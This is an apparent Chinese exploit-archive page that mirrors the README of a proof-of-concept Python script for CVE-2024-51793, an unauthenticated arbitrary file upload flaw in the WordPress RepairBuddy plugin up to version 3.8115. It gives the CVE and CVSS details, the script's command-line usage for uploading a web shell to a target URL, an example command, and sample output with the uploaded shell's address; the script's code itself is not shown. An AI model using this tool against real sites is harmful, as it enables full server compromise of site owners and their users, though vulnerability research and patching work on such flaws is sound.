关联漏洞
            
        
            描述
             WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability
        
        
            介绍
            # 🛡️ WordPress RepairBuddy Plugin Exploit
## 📜 CVE Information
**CVE-ID:** CVE-2024-51793  
**Published:** 2024-11-11  
**Updated:** 2024-11-11  
**Title:** WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability  
**Description:**  
Unrestricted Upload of File with Dangerous Type vulnerability in Webful Creations Computer Repair Shop allows Upload a Web Shell to a Web Server. This issue affects Computer Repair Shop: from n/a through 3.8115.
**CWE:**  
- [CWE-434: Unrestricted Upload of File with Dangerous Type](https://cwe.mitre.org/data/definitions/434.html)
**CVSS:**  
- **Score:** 10.0 (CRITICAL)
- **Version:** 3.1
- **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
## 📋 Description
This is a proof of concept exploit for the Arbitrary File Upload vulnerability in the WordPress RepairBuddy plugin versions <= 3.8115. The exploit allows an attacker to upload a web shell to the vulnerable server.
## ⚙️ Requirements
- Python 3.x
- `requests` library (`pip install requests`)
## 🚀 Usage
```shell
usage: 
CVE-2024-51793.py [-h] -u URL [-shell SHELL]
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.
options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload
```
## 📖 Example
```shell
python 
CVE-2024-51793.py -u http://target.com/wordpress
```
## 📝 Output
```text
Exploit By : Nxploit Khaled Alenazi,
🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><img src=\"http:\/\/target\/wordpress\/wp-content\/plugins\/computer-repair-shop\/assets\/images\/attachment.png\" class=\"\" \/><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
```
## 👨💻 Author
Exploit By: Nxploited, Khaled Alenazi
        
        文件快照
        
            
                
 [4.0K]  /data/pocs/ea61507d99b82a3e2defe988667a44c4cfcabfbe
├── [4.9K]  CVE-2024-51793.py
└── [2.2K]  README.md
0 directories, 2 files
                
             
         
        备注
        
            
                1. 建议优先通过来源进行访问。
                2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
                3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。